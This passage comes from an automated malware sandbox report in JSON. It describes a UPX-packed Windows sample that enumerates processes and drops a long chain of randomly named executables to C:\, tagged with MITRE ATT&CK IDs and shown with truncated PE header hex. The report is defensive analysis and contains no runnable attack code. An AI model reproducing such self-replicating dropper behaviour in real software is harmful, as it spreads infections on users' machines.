\"th32ProcessID\": \"0\"}\n \"04466.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"088400.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"444866.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"66822.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tvvfv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bvfpxr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"htbtt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6266488.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has an entrypoint in section \"UPX1\"\n \"xvpdt.exe\" has an entrypoint in section \"UPX1\"\n \"hbpvtv.exe\" has an entrypoint in section \"UPX1\"\n \"hfxhd.exe\" has an entrypoint in section \"UPX1\"\n \"vjdjljv.exe\" has an entrypoint in section \"UPX1\"\n \"rffrrb.exe\" has an entrypoint in section \"UPX1\"\n \"nvdfbr.exe\" has an entrypoint in section \"UPX1\"\n \"02886.exe\" has an entrypoint in section \"UPX1\"\n \"2086280.exe\" has an entrypoint in section \"UPX1\"\n \"84862.exe\" has an entrypoint in section \"UPX1\"\n \"xppdbt.exe\" has an entrypoint in section \"UPX1\"\n \"0082442.exe\" has an entrypoint in section \"UPX1\"\n \"hvtvd.exe\" has an entrypoint in section \"UPX1\"\n \"djlrn.exe\" has an entrypoint in section \"UPX1\"\n \"86488.exe\" has an entrypoint in section \"UPX1\"\n \"246648.exe\" has an entrypoint in section \"UPX1\"\n \"xjnvbp.exe\" has an entrypoint in section \"UPX1\"\n \"tjnrdtx.exe\" has an entrypoint in section \"UPX1\"\n \"2860666.exe\" has an entrypoint in section \"UPX1\"\n \"46228.exe\" has an entrypoint in section \"UPX1\"\n \"226688.exe\" has an entrypoint in section \"UPX1\"\n \"88406.exe\" has an entrypoint in section \"UPX1\"\n \"0248006.exe\" has an entrypoint in section \"UPX1\"\n \"08802.exe\" has an entrypoint in section \"UPX1\"\n \"24440.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" wrote 14468 bytes starting with PE header signature to file \"C:\\2662206.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2662206.exe\" wrote 14488 bytes starting with PE header signature to file \"C:\\2668286.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2668286.exe\" wrote 14502 bytes starting with PE header signature to file \"C:\\22420.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22420.exe\" wrote 14518 bytes starting with PE header signature to file \"C:\\202828.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"202828.exe\" wrote 14535 bytes starting with PE header signature to file \"C:\\pndnt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pndnt.exe\" wrote 14554 bytes starting with PE header signature to file \"C:\\rbbttj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rbbttj.exe\" wrote 14572 bytes starting with PE header signature to file \"C:\\tdthpd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tdthpd.exe\" wrote 14587 bytes starting with PE header signature to file \"C:\\rhhbnrn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhhbnrn.exe\" wrote 14598 bytes starting with PE header signature to file \"C:\\txphbj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"txphbj.exe\" wrote 14616 bytes starting with PE header signature to file \"C:\\0862264.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0862264.exe\" wrote 14626 bytes starting with PE header signature to file \"C:\\6042668.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6042668.exe\" wrote 14636 bytes starting with PE header signature to file \"C:\\6408002.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6408002.exe\" wrote 14647 bytes starting with PE header signature to file \"C:\\8266402.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8266402.exe\" wrote 14660 bytes starting with PE header signature to file \"C:\\trtdln.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"trtdln.exe\" wrote 14679 bytes starting with PE header signature to file \"C:\\jdtpf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jdtpf.exe\" wrote 14698 bytes starting with PE header signature to file \"C:\\tbhlt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tbhlt.exe\" wrote 14711 bytes starting with PE header signature to file \"C:\\trxpd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"trxpd.exe\" wrote 14727 bytes starting with PE header signature to file \"C:\\82880.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"82880.exe\" wrote 14743 bytes starting with PE header signature to file \"C:\\44882.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"44882.exe\" wrote 14762 bytes starting with PE header signature to file \"C:\\828882.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"828882.exe\" wrote 14782 bytes starting with PE header signature to file \"C:\\2204222.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2204222.exe\" wrote 14801 bytes starting with PE header signature to file \"C:\\028488.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"028488.exe\" wrote 14812 bytes starting with PE header signature to file \"C:\\62820.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"62820.exe\" wrote 14823 bytes starting with PE header signature to file \"C:\\80840.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"80840.exe\" wrote 14837 bytes starting with PE header signature to file \"C:\\22884.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22884.exe\" wrote 14851 bytes starting with PE header signature to file \"C:\\88220.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"88220.exe\" wrote 14861 bytes starting with PE header signature to file \"C:\\2466400.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2466400.exe\" wrote 14876 bytes starting with PE header signature to file \"C:\\04466.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"04466.exe\" wrote 14894 bytes starting with PE header signature to file \"C:\\088400.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"088400.exe\" wrote 14910 bytes starting with PE header signature to file \"C:\\444866.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"444866.exe\" wrote 14929 bytes starting with PE header signature to file \"C:\\66822.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66822.exe\" wrote 14939 bytes starting with PE header signature to file \"C:\\822088.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"822088.exe\" wrote 14959 bytes starting with PE header signature to file \"C:\\rfppdt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rfppdt.exe\" wrote 14970 bytes starting with PE header signature to file \"C:\\tvvfv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tvvfv.exe\" wrote 14988 bytes starting with PE header signature to file \"C:\\phtdn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"phtdn.exe\" wrote 15004 bytes starting with PE header signature to file \"C:\\bvfpxr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bvfpxr.exe\" wrote 15016 bytes starting with PE header signature to file \"C:\\htbtt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"htbtt.exe\" wrote 15028 bytes starting with PE header signature to file \"C:\\6266488.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6266488.exe\" wrote 15041 bytes starting with PE header signature to file \"C:\\86602.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"86602.exe\" wrote 15051 bytes starting with PE header signature to file \"C:\\8868006.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8868006.exe\" wrote 15067 bytes starting with PE header signature to file \"C:\\fttbvhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fttbvhn.exe\" wrote 15084 bytes starting with PE header signature to file \"C:\\dbbpb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dbbpb.exe\" wrote 15100 bytes starting with PE header signature to file \"C:\\fnhrv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnhrv.exe\" wrote 15117 bytes starting with PE header signature to file \"C:\\jxtxllv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jxtxllv.exe\" wrote 15129 bytes starting with PE header signature to file \"C:\\xpxpjbf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xpxpjbf.exe\" wrote 15143 bytes starting with PE header signature to file \"C:\\tthvrx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tthvrx.exe\" wrote 15157 bytes starting with PE header signature to file \"C:\\rddvv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rddvv.exe\" wrote 15175 bytes starting with PE header signature to file \"C:\\vjtpp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vjtpp.exe\" wrote 15188 bytes starting with PE header signature to file \"C:\\tlflpxl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tlflpxl.exe\" wrote 15207 bytes starting with PE header signature to file \"C:\\ndnvbhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ndnvbhn.exe\" wrote 15218 bytes starting with PE header signature to file \"C:\\260604.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"260604.exe\" wrote 15231 bytes starting with PE header signature to file \"C:\\086684.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"086684.exe\" wrote 15245 bytes starting with PE header signature to file \"C:\\860486.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"860486.exe\" wrote 15256 bytes starting with PE header signature to file \"C:\\64644.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64644.exe\" wrote 15276 bytes starting with PE header signature to file \"C:\\084808.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"084808.exe\" wrote 15295 bytes starting with PE header signature to file \"C:\\0284862.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0284862.exe\" wrote 15309 bytes starting with PE header signature to file \"C:\\242662.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"242662.exe\" wrote 15320 bytes starting with PE header signature to file \"C:\\6460462.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6460462.exe\" wrote 15340 bytes starting with PE header signature to file \"C:\\24440.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24440.exe\" wrote 15359 bytes starting with PE header signature to file \"C:\\08802.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"08802.exe\" wrote 15371 bytes starting with PE header signature to file \"C:\\0248006.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0248006.exe\" wrote 15386 bytes starting with PE header signature to file \"C:\\88406.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"88406.exe\" wrote 15398 bytes starting with PE header signature to file \"C:\\226688.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"226688.exe\" wrote 15410 bytes starting with PE header signature to file \"C:\\46228.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"xvpdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hbpvtv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hfxhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vjdjljv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rffrrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nvdfbr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"02886.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2086280.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"84862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xppdbt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"0082442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hvtvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"djlrn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"86488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"246648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xjnvbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tjnrdtx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2860666.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"46228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\46228.exe]- [targetUID: 00000000-00004524]\n \"226688.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\226688.exe]- [targetUID: 00000000-00001524]\n \"88406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\88406.exe]- [targetUID: 00000000-00001524]\n \"0248006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0248006.exe]- [targetUID: 00000000-00003536]\n \"08802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08802.exe]- [targetUID: 00000000-00003536]\n \"24440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24440.exe]- [targetUID: 00000000-00003628]\n \"6460462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6460462.exe]- [targetUID: 00000000-00004152]\n \"242662.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\242662.exe]- [targetUID: 00000000-00004152]\n \"0284862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0284862.exe]- [targetUID: 00000000-00001692]\n \"084808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\084808.exe]- [targetUID: 00000000-00000896]\n \"64644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64644.exe]- [targetUID: 00000000-00000896]\n \"860486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\860486.exe]- [targetUID: 00000000-00001472]\n \"086684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\086684.exe]- [targetUID: 00000000-00000552]\n \"260604.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\260604.exe]- [targetUID: 00000000-00001376]\n \"ndnvbhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndnvbhn.exe]- [targetUID: 00000000-00000456]\n \"tlflpxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tlflpxl.exe]- [targetUID: 00000000-00000456]\n \"vjtpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjtpp.exe]- [targetUID: 00000000-00000848]\n \"rddvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rddvv.exe]- [targetUID: 00000000-00003164]\n \"tthvrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tthvrx.exe]- [targetUID: 00000000-00003816]\n \"xpxpjbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xpxpjbf.exe]- [targetUID: 00000000-00001424]\n \"jxtxllv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxtxllv.exe]- [targetUID: 00000000-00001424]\n \"fnhrv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnhrv.exe]- [targetUID: 00000000-00000656]\n \"dbbpb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dbbpb.exe]- [targetUID: 00000000-00000656]\n \"fttbvhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fttbvhn.exe]- [targetUID: 00000000-00003204]\n \"8868006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to 